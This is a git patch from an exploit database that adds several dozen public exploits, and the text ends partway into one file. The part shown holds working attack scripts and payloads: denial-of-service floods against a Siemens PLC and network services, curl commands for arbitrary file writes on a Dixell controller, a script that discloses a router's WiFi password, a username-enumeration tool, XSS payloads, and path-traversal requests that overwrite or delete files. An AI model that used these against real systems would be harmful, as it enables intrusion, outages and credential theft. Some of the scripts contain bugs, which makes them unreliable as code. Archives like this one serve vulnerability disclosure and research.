From 1472d8e7230de02ec01732cd1a160c7cef6767da Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 6 Jan 2022 05:01:54 +0000 Subject: [PATCH] DB: 2022-01-06 32 changes to exploits/shellcodes Siemens S7 Layer 2 - Denial of Service (DoS) TRIGONE Remote System Monitor 3.61 - Unquoted Service Path Automox Agent 32 - Local Privilege Escalation ConnectWise Control 19.2.24707 - Username Enumeration Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS) AWebServer GhostBuilding 18 - Denial of Service (DoS) TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated) Dixell XWEB 500 - Arbitrary File Write Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated) CMSimple 5.4 - Cross Site Scripting (XSS) RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated) RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated) RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) Movie Rating System 1.0 - SQLi to RCE (Unauthenticated) Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS) SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS) Nettmp NNT 5.1 - SQLi Authentication Bypass Hostel Management System 2.1 - Cross Site Scripting (XSS) Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated) BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated) Hospitals Patient Records Management System 1.0 - Account TakeOver Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated) Vodafone H-500-s 3.5.10 - WiFi Password Disclosure openSIS Student Information System 8.0 - 'multiple' SQL Injection Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS) WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated) --- exploits/android/remote/50629.py | 85 +++++++++++++ exploits/hardware/dos/50613.py | 105 ++++++++++++++++ exploits/hardware/remote/50620.py | 41 +++++++ exploits/hardware/remote/50639.txt | 29 +++++ exploits/hardware/webapps/50636.py | 27 +++++ exploits/multiple/remote/50618.py | 178 ++++++++++++++++++++++++++++ exploits/multiple/webapps/50632.txt | 40 +++++++ exploits/php/webapps/50612.txt | 30 +++++ exploits/php/webapps/50614.txt | 110 +++++++++++++++++ exploits/php/webapps/50615.txt | 53 +++++++++ exploits/php/webapps/50616.txt | 143 ++++++++++++++++++++++ exploits/php/webapps/50617.txt | 84 +++++++++++++ exploits/php/webapps/50619.py | 86 ++++++++++++++ exploits/php/webapps/50621.py | 56 +++++++++ exploits/php/webapps/50622.py | 71 +++++++++++ exploits/php/webapps/50623.py | 88 ++++++++++++++ exploits/php/webapps/50624.py | 39 ++++++ exploits/php/webapps/50625.txt | 20 ++++ exploits/php/webapps/50626.txt | 19 +++ exploits/php/webapps/50627.txt | 31 +++++ exploits/php/webapps/50628.txt | 15 +++ exploits/php/webapps/50630.txt | 22 ++++ exploits/php/webapps/50631.txt | 122 +++++++++++++++++++ exploits/php/webapps/50634.txt | 35 ++++++ exploits/php/webapps/50635.py | 113 ++++++++++++++++++ exploits/php/webapps/50637.txt | 60 ++++++++++ exploits/php/webapps/50641.txt | 22 ++++ exploits/php/webapps/50643.txt | 16 +++ exploits/python/remote/50640.py | 130 ++++++++++++++++++++ exploits/windows/local/50633.txt | 32 +++++ exploits/windows/local/50642.ps1 | 42 +++++++ exploits/windows/remote/50638.txt | 12 ++ files_exploits.csv | 32 +++++ 33 files changed, 1988 insertions(+) create mode 100755 exploits/android/remote/50629.py create mode 100755 exploits/hardware/dos/50613.py create mode 100755 exploits/hardware/remote/50620.py create mode 100644 exploits/hardware/remote/50639.txt create mode 100755 exploits/hardware/webapps/50636.py create mode 100755 exploits/multiple/remote/50618.py create mode 100644 exploits/multiple/webapps/50632.txt create mode 100644 exploits/php/webapps/50612.txt create mode 100644 exploits/php/webapps/50614.txt create mode 100644 exploits/php/webapps/50615.txt create mode 100644 exploits/php/webapps/50616.txt create mode 100644 exploits/php/webapps/50617.txt create mode 100755 exploits/php/webapps/50619.py create mode 100755 exploits/php/webapps/50621.py create mode 100755 exploits/php/webapps/50622.py create mode 100755 exploits/php/webapps/50623.py create mode 100755 exploits/php/webapps/50624.py create mode 100644 exploits/php/webapps/50625.txt create mode 100644 exploits/php/webapps/50626.txt create mode 100644 exploits/php/webapps/50627.txt create mode 100644 exploits/php/webapps/50628.txt create mode 100644 exploits/php/webapps/50630.txt create mode 100644 exploits/php/webapps/50631.txt create mode 100644 exploits/php/webapps/50634.txt create mode 100755 exploits/php/webapps/50635.py create mode 100644 exploits/php/webapps/50637.txt create mode 100644 exploits/php/webapps/50641.txt create mode 100644 exploits/php/webapps/50643.txt create mode 100755 exploits/python/remote/50640.py create mode 100644 exploits/windows/local/50633.txt create mode 100644 exploits/windows/local/50642.ps1 create mode 100644 exploits/windows/remote/50638.txt diff --git a/exploits/android/remote/50629.py b/exploits/android/remote/50629.py new file mode 100755 index 000000000..df9b2d4e3 --- /dev/null +++ b/exploits/android/remote/50629.py @@ -0,0 +1,85 @@ +# Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS) +# Date: 28/12/2021 +# Exploit Author: Andres Ramos [Invertebrado] +# Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm +# Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en +# Version: AWebServer GhostBuilding 18 +# Tested on: Android + +#!/usr/bin/python3 + +# ********************************************************************************* +# * Author: Andres Ramos [Invertebrado] * +# * AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash * +# ********************************************************************************* + +import signal +import requests +from pwn import * + +#Colors +class colors(): + GREEN = "\033[0;32m\033[1m" + END = "\033[0m" + RED = "\033[0;31m\033[1m" + BLUE = "\033[0;34m\033[1m" + YELLOW = "\033[0;33m\033[1m" + PURPLE = "\033[0;35m\033[1m" + TURQUOISE = "\033[0;36m\033[1m" + GRAY = "\033[0;37m\033[1m" + +exit = False + +def def_handler(sig, frame): + print(colors.RED + "\n[!] Exiting..." + colors.END) + exit = True + sys.exit(0) + + if threading.activeCount() > 1: + os.system("tput cnorm") + os._exit(getattr(os, "_exitcode", 0)) + else: + os.system("tput cnorm") + sys.exit(getattr(os, "_exitcode", 0)) + +signal.signal(signal.SIGINT, def_handler) + +if len(sys.argv) < 3: + print(colors.RED + "\n[!] Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END) + sys.exit(1) + +url = sys.argv[1] +Tr = sys.argv[2] + +def http(): + counter = 0 + p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END) + while True: + r = requests.get(url) + r = requests.get(url + "/mysqladmin") + counter += 2 + p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END) + + if exit: + break + +if __name__ == '__main__': + + threads = [] + + try: + for i in range(0, int(Tr)): + t = threading.Thread(target=http) + threads.append(t) + + sys.stderr = open("/dev/null", "w") + + for x in threads: + x.start() + + for x in threads: + x.join() + + except Exception as e: + log.failure(str(e)) + sys.exit(1) \ No newline at end of file diff --git a/exploits/hardware/dos/50613.py b/exploits/hardware/dos/50613.py new file mode 100755 index 000000000..f6769e750 --- /dev/null +++ b/exploits/hardware/dos/50613.py @@ -0,0 +1,105 @@ +# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS) +# Date: 21/10/2021 +# Exploit Author: RoseSecurity +# Vendor Homepage: https://www.siemens.com/us/en.html +# Version: Firmware versions >= 3 +# Tested on: Siemens S7-300, S7-400 PLCs + + +#!/usr/bin/python3 + +from scapy.all import * +from colorama import Fore, Back, Style +from subprocess import Popen, PIPE +from art import * +import threading +import subprocess +import time +import os +import sys +import re + +# Banner + +print(Fore.RED + r""" + + ▄▄▄· ▄• ▄▌▄▄▄▄▄ • ▌ ▄ ·. ▄▄▄· ▄▄▄▄▄ ▄▄▄ +▐█ ▀█ █▪██▌•██ ▪ ·██ ▐███▪▐█ ▀█ •██ ▪ ▀▄ █· +▄█▀▀█ █▌▐█▌ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ +▐█ ▪▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ + ▀ ▀ ▀▀▀ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀ +▄▄▄▄▄▄▄▄ .▄▄▄ • ▌ ▄ ·. ▪ ▐ ▄ ▄▄▄· ▄▄▄▄▄ ▄▄▄ +•██ ▀▄.▀·▀▄ █··██ ▐███▪██ •█▌▐█▐█ ▀█ •██ ▪ ▀▄ █· + ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ + ▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ + ▀▀▀ ▀▀▀ .▀ ▀▀▀ █▪▀▀▀▀▀▀▀▀ █▪ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀ + """) + +time.sleep(1.5) + +# Get IP to exploit + +IP = input("Enter the IP address of the device to exploit: ") + +# Find the mac address of the device + +Mac = getmacbyip(IP) + +# Function to send the ouput to "nothing" + +def NULL (): + + f = open(os.devnull, 'w') + sys.stdout = f + +# Eternal loop to produce DoS condition + +def Arnold (): + + AutomatorTerminator = True + + while AutomatorTerminator == True: + Packet = Ether() + Packet.dst = "00:00:00:00:00:00" + Packet.src = Mac + sendp(Packet) + NULL() +def Sarah (): + + AutomatorTerminator = True + + while AutomatorTerminator == True: + Packet = Ether() + Packet.dst = "00:00:00:00:00:00" + Packet.src = Mac + sendp(Packet) + NULL() +def Kyle (): + AutomatorTerminator = True + + while AutomatorTerminator == True: + Packet = Ether() + Packet.dst = "00:00:00:00:00:00" + Packet.src = Mac + sendp(Packet) + NULL() + +# Arnold +ArnoldThread = threading.Thread(target=Arnold) +ArnoldThread.start() +ArnoldThread.join() +NULL() + +# Sarah + +SarahThread = threading.Thread(target=Sarah) +SarahThread.start() +SarahThread.join() +NULL() + +# Kyle + +KyleThread = threading.Thread(target=Kyle) +KyleThread.start() +KyleThread.join() +NULL() \ No newline at end of file diff --git a/exploits/hardware/remote/50620.py b/exploits/hardware/remote/50620.py new file mode 100755 index 000000000..670952f72 --- /dev/null +++ b/exploits/hardware/remote/50620.py @@ -0,0 +1,41 @@ +# Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS) +# Discovered by: Yehia Elghaly +# Discovered Date: 22/12/2021 +# Vendor Homepage: https://www.accu-time.com/ +# Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/ +# Tested Version: 1.0 +# Vulnerability Type: Buffer Overflow (DoS) Remote +# Tested on OS: linux + +# Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow + +# Steps to reproduce: +# 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23 +# 2. - Run the Script from remote PC/IP +# 3. - Telnet Crashed + +#!/usr/bin/env python3 + +import socket +import sys +print("#######################################################") +print("# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #") +print("# -------------------------- #") +print("# BY Yehia Elghaly #") +print("#######################################################") + +if (len(sys.argv)<2): + print ("Usage: %s ") % sys.argv[0] + print ("Example: %s 192.168.113.1 ") % sys.argv[0] + exit(0) + +print ("\nSending Evil.......Buffer...") +s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + +try: + s.connect((sys.argv[1], 23)) + buffer = "A"*9400 + s.send(" Crashed Check the connection") + Print ("Crashed") +except: + print ("Could not connect to ACCU Time Telnet!") \ No newline at end of file diff --git a/exploits/hardware/remote/50639.txt b/exploits/hardware/remote/50639.txt new file mode 100644 index 000000000..44d200931 --- /dev/null +++ b/exploits/hardware/remote/50639.txt @@ -0,0 +1,29 @@ +# Exploit Title: Dixell XWEB-500 - Arbitrary File Write +# Google Dork: inurl:"xweb500.cgi" +# Date: 03/01/2022 +# Exploit Author: Roberto Palamaro +# Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it +# Version: XWEB-500 +# Tested on: Dixell XWEB-500 +# References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/ + +# Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability + +# Endpoint: logo_extra_upload.cgi +# Here the first line of the POC is the filename and the second one is the content of the file be written +# Write file +echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' +# Verify +curl -A Chrome -is "http://[target]:[port]/logo/" + +# Endpoint: lo_utils.cgi +# Here ACTION=5 is to enable write mode +echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' +# Verify using ACTION=3 to listing resources +echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' + +# Endpoint: cal_save.cgi +# Here the first line of the POC is the filename and the second one is the content of the file be written +echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' +# Verify +curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi \ No newline at end of file diff --git a/exploits/hardware/webapps/50636.py b/exploits/hardware/webapps/50636.py new file mode 100755 index 000000000..24ac46e67 --- /dev/null +++ b/exploits/hardware/webapps/50636.py @@ -0,0 +1,27 @@ +# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure +# Date: 01/01/2022 +# Exploit Author: Daniel Monzón (stark0de) +# Vendor Homepage: https://www.vodafone.es/ +# Software Link: N/A +# Version: Firmware version Vodafone-H-500-s-v3.5.10 +# Hardware model: Sercomm VFH500 + +# The WiFi access point password gets disclosed just by performing a GET request with certain headers + +import requests +import sys +import json +if len(sys.argv) != 2: +print("Usage: python3 vodafone-pass-disclose.py http://IP") +sys.exit() +url = sys.argv[1]+"/data/activation.json" +cookies = {"pageid": "129"} +headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 + +Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept- +Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested- +With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"} + +req=requests.get(url, headers=headers, cookies=cookies) +result=json.loads(req.text)[3].get("wifi_password") +print("[+] The wifi password is: "+result) \ No newline at end of file diff --git a/exploits/multiple/remote/50618.py b/exploits/multiple/remote/50618.py new file mode 100755 index 000000000..9b3ab9c15 --- /dev/null +++ b/exploits/multiple/remote/50618.py @@ -0,0 +1,178 @@ +# Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration +# Date: 17/12/2021 +# Exploit Author: Luca Cuzzolin aka czz78 +# Vendor Homepage: https://www.connectwise.com/ +# Version: vulnerable <= 19.2.24707 +# CVE : CVE-2019-16516 + +# https://github.com/czz/ScreenConnect-UserEnum + +from multiprocessing import Process, Queue +from statistics import mean +from urllib3 import exceptions as urlexcept +import argparse +import math +import re +import requests + +class bcolors: + HEADER = '\033[95m' + OKBLUE = '\033[94m' + OKCYAN = '\033[96m' + OKGREEN = '\033[92m' + WARNING = '\033[93m' + FAIL = '\033[91m' + ENDC = '\033[0m' + BOLD = '\033[1m' + UNDERLINE = '\033[4m' + + +headers = [] + +def header_function(header_line): + headers.append(header_line) + + +def process_enum(queue, found_queue, wordlist, url, payload, failstr, verbose, proc_id, stop, proxy): + try: + # Payload to dictionary + payload_dict = {} + for load in payload: + split_load = load.split(":") + if split_load[1] != '{USER}': + payload_dict[split_load[0]] = split_load[1] + else: + payload_dict[split_load[0]] = '{USER}' + + # Enumeration + total = len(wordlist) + for counter, user in enumerate(wordlist): + user_payload = dict(payload_dict) + for key, value in user_payload.items(): + if value == '{USER}': + user_payload[key] = user + + dataraw = "".join(['%s=%s&' % (key, value) for (key, value) in user_payload.items()])[:-1] + headers={"Accept": "*/*" , "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"} + + req = requests.request('POST',url,headers=headers,data=dataraw, proxies=proxies) + + x = "".join('{}: {}'.format(k, v) for k, v in req.headers.items()) + + if re.search(r"{}".format(failstr), str(x).replace('\n','').replace('\r','')): + queue.put((proc_id, "FOUND", user)) + found_queue.put((proc_id, "FOUND", user)) + if stop: break + elif verbose: + queue.put((proc_id, "TRIED", user)) + queue.put(("PERCENT", proc_id, (counter/total)*100)) + + except (urlexcept.NewConnectionError, requests.exceptions.ConnectionError): + print("[ATTENTION] Connection error on process {}! Try lowering the amount of threads with the -c parameter.".format(proc_id)) + + +if __name__ == "__main__": + # Arguments + parser = argparse.ArgumentParser(description="http://example.com/Login user enumeration tool") + parser.add_argument("url", help="http://example.com/Login") + parser.add_argument("wordlist", help="username wordlist") + parser.add_argument("-c", metavar="cnt", type=int, default=10, help="process (thread) count, default 10, too many processes may cause connection problems") + parser.add_argument("-v", action="store_true", help="verbose mode") + parser.add_argument("-s", action="store_true", help="stop on first user found") + parser.add_argument("-p", metavar="proxy", type=str, help="socks4/5 http/https proxy, ex: socks5://127.0.0.1:9050") + args = parser.parse_args() + + # Arguments to simple variables + wordlist = args.wordlist + url = args.url + payload = ['ctl00%24Main%24userNameBox:{USER}', 'ctl00%24Main%24passwordBox:a', 'ctl00%24Main%24ctl05:Login', '__EVENTTARGET:', '__EVENTARGUMENT:', '__VIEWSTATE:'] + verbose = args.v + thread_count = args.c + failstr = "PasswordInvalid" + stop = args.s + proxy= args.p + + print(bcolors.HEADER + """ + __ ___ __ ___ +| | |__ |__ |__) |__ |\ | | | |\/| +|__| ___| |___ | \ |___ | \| |__| | | + +ScreenConnect POC by czz78 :) + + """+ bcolors.ENDC); + print("URL: "+url) + print("Payload: "+str(payload)) + print("Fail string: "+failstr) + print("Wordlist: "+wordlist) + if verbose: print("Verbose mode") + if stop: print("Will stop on first user found") + + proxies = {'http': '', 'https': ''} + if proxy: + proxies = {'http': proxy, 'https': proxy} + + print("Initializing processes...") + # Distribute wordlist to processes + wlfile = open(wordlist, "r", encoding="ISO-8859-1") # or utf-8 + tothread = 0 + wllist = [[] for i in range(thread_count)] + for user in wlfile: + wllist[tothread-1].append(user.strip()) + if (tothread < thread_count-1): + tothread+=1 + else: + tothread = 0 + + # Start processes + tries_q = Queue() + found_q = Queue() + processes = [] + percentage = [] + last_percentage = 0 + for i in range(thread_count): + p = Process(target=process_enum, args=(tries_q, found_q, wllist[i], url, payload, failstr, verbose, i, stop, proxy)) + processes.append(p) + percentage.append(0) + p.start() + + print(bcolors.OKBLUE + "Processes started successfully! Enumerating." + bcolors.ENDC) + # Main process loop + initial_count = len(processes) + while True: + # Read the process output queue + try: + oldest = tries_q.get(False) + if oldest[0] == 'PERCENT': + percentage[oldest[1]] = oldest[2] + elif oldest[1] == 'FOUND': + print(bcolors.OKGREEN + "[{}] FOUND: {}".format(oldest[0], oldest[2]) + bcolors.ENDC) + elif verbose: + print(bcolors.OKCYAN + "[{}] Tried: {}".format(oldest[0], oldest[2]) + bcolors.ENDC) + except: pass + + # Calculate completion percentage and print if /10 + total_percentage = math.ceil(mean(percentage)) + if total_percentage % 10 == 0 and total_percentage != last_percentage: + print("{}% complete".format(total_percentage)) + last_percentage = total_percentage + + # Pop dead processes + for k, p in enumerate(processes): + if p.is_alive() == False: + processes.pop(k) + + # Terminate all processes if -s flag is present + if len(processes) < initial_count and stop: + for p in processes: + p.terminate() + + # Print results and terminate self if finished + if len(processes) == 0: + print(bcolors.OKBLUE + "EnumUser finished, and these usernames were found:" + bcolors.ENDC) + while True: + try: + entry = found_q.get(False) + print(bcolors.OKGREEN + "[{}] FOUND: {}".format(entry[0], entry[2]) + bcolors.ENDC) + except: + break + quit() \ No newline at end of file diff --git a/exploits/multiple/webapps/50632.txt b/exploits/multiple/webapps/50632.txt new file mode 100644 index 000000000..75424e8c4 --- /dev/null +++ b/exploits/multiple/webapps/50632.txt @@ -0,0 +1,40 @@ +# Exploit Title: BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated) +# Google Dork: intext:"BeyondTrust" "Redistribution Prohibited" +# Date: 30/12/2021 +# Exploit Author: Malcrove +# Vendor Homepage: https://www.beyondtrust.com/ +# Version: v6.0 and earlier versions + +Summary: + +Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint. + + +Vulnerability Details: + +Affected Endpoint: /appliance/login +Affected Parameter: login[password] +Request Method: GET or POST + + +Proof of concept (POC): + +By navigating to the below link from a modern web browser, alert(document.domain) Javascript method would be fired in the same context of Beyondtrust Remote Support domain. + +http:///appliance/login?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password + + +Mitigation: + +A fix has been released by the vendor in NSBase 6.1. It's recommended to update the vulnerable appliance base version to the latest version. + +- Time-Line: + + April 6, 2021: Vulnerability advisory sent to the vendor (Beyondtrust) + April 8, 2021: Recevied an initial reply from the vendor + Jun 10, 2021: The vendor released a fix for the vulnerability in NSbase 6.1 + Dec 30, 2021: The Responsible public disclosure + + +- Credits +Ahmed Aboul-Ela (Malcrove) \ No newline at end of file diff --git a/exploits/php/webapps/50612.txt b/exploits/php/webapps/50612.txt new file mode 100644 index 000000000..b1d1c74ac --- /dev/null +++ b/exploits/php/webapps/50612.txt @@ -0,0 +1,30 @@ +# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS) +# Date: 22/10/2021 +# Exploit Author: heinjame +# Vendor Homepage: https://www.cmsimple.org/en/ +# Software Link: https://www.cmsimple.org/en/?Downloads +# Version: <=5.4 +# Tested on: Linux os + +[Description] + +Since the application is filtering user input with preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding. + +So the application let's attacker perform DOM based XSS. + +[Payload and POC] + +File > images > Upload a file + +Attack vector >> ')-alert(1)// (need to encode)>> +')-alert(1)// + +When the victim clicks the delete button,an alert will be executed. + +Script to encode the payload + +payload = input() +finalpayload = "" +for i in payload: + finalpayload = finalpayload + "&#" + str(ord(i)) + ";" +print(finalpayload) \ No newline at end of file diff --git a/exploits/php/webapps/50614.txt b/exploits/php/webapps/50614.txt new file mode 100644 index 000000000..4c2abb83a --- /dev/null +++ b/exploits/php/webapps/50614.txt @@ -0,0 +1,110 @@ +# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated) +# Date: 25/07/2021 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://ritecms.com/ +# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip +# Version: <= 3.1.0 +# Google Dork: intext:"Powered by RiteCMS" +# Tested on: Windows 10, Ubuntu 18, XAMPP +# Reference: https://gist.github.com/faisalfs10x/4a3b76f666ff4c0443e104c3baefb91b + + +################ +# Description # +################ + +# RiteCMS version 3.1.0 and below suffers from an arbitrary file overwrite vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to overwrite any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to write). Furthermore, an attacker might leverage the capability of arbitrary file overwrite to modify existing file such as /etc/passwd or /etc/shadow if the current PHP process user is run as root. + + +############################################################ +# PoC to overwrite existing index.php to display phpinfo() # +############################################################ + + +Steps to Reproduce: + +1. Login as admin +2. Go to File Manager +3. Then, click Upload file > Browse.. +4. Upload any file and click checkbox name "overwrite file with same name" +4. Intercept the request and replace current file name to any files path on the server via parameter "file_name". + + +PoC: param file_name - to overwrite index.php to display phpinfo, so the payload will be "../index.php" + param filename - with the content of "" + +Request: +======== + +POST /ritecmsv3.1.0/admin.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------351719865731412638493510448298 +Content-Length: 1840 +Origin: http://localhost +DNT: 1 +Connection: close +Referer: http://192.168.8.143/ritecmsv3.1.0/admin.php?mode=filemanager&action=upload&directory=media +Cookie: PHPSESSID=nuevl0lgkrc3dv44g3vgkoqqre +Upgrade-Insecure-Requests: 1 +Sec-GPC: 1 + +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="mode" + +filemanager +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="file"; filename="anyfile.txt" +Content-Type: application/octet-stream + +content of the file to overwrite here +-- this is example to overwrite index.php to display phpinfo -- + +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="directory" + +media +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="file_name" + +../index.php +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="overwrite_file" + +true +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="upload_mode" + +1 +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="resize_xy" + +x +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="resize" + +640 +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="compression" + +80 +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="thumbnail_resize_xy" + +x +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="thumbnail_resize" + +150 +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="thumbnail_compression" + +70 +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="upload_file_submit" + +OK - Upload file +-----------------------------351719865731412638493510448298-- \ No newline at end of file diff --git a/exploits/php/webapps/50615.txt b/exploits/php/webapps/50615.txt new file mode 100644 index 000000000..d1eee420b --- /dev/null +++ b/exploits/php/webapps/50615.txt @@ -0,0 +1,53 @@ +# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated) +# Date: 25/07/2021 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://ritecms.com/ +# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip +# Version: <= 3.1.0 +# Google Dork: intext:"Powered by RiteCMS" +# Tested on: Windows 10, Ubuntu 18, XAMPP +# Reference: https://gist.github.com/faisalfs10x/5514b3eaf0a108e27f45657955e539fd + + +################ +# Description # +################ + +# RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. + + +##################################################### +# PoC to delete secretConfig.conf file in web root # +##################################################### + + +Steps to Reproduce: + +1. Login as admin +2. Go to File Manager +3. Delete any file +4. Intercept the request and replace current file name to any files on the server via parameter "delete". + +# Assumed there is a secretConfig.conf file in web root + +PoC: param delete - Deleting secretConfig.conf file in web root, so the payload will be "../secretConfig.conf" + +Request: +======== + +GET /ritecms.v3.1.0/admin.php?mode=filemanager&directory=media&delete=../secretConfig.conf&confirmed=true HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager +Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Sec-GPC: 1 \ No newline at end of file diff --git a/exploits/php/webapps/50616.txt b/exploits/php/webapps/50616.txt new file mode 100644 index 000000000..87b31e2c5 --- /dev/null +++ b/exploits/php/webapps/50616.txt @@ -0,0 +1,143 @@ +# Exploit Title: 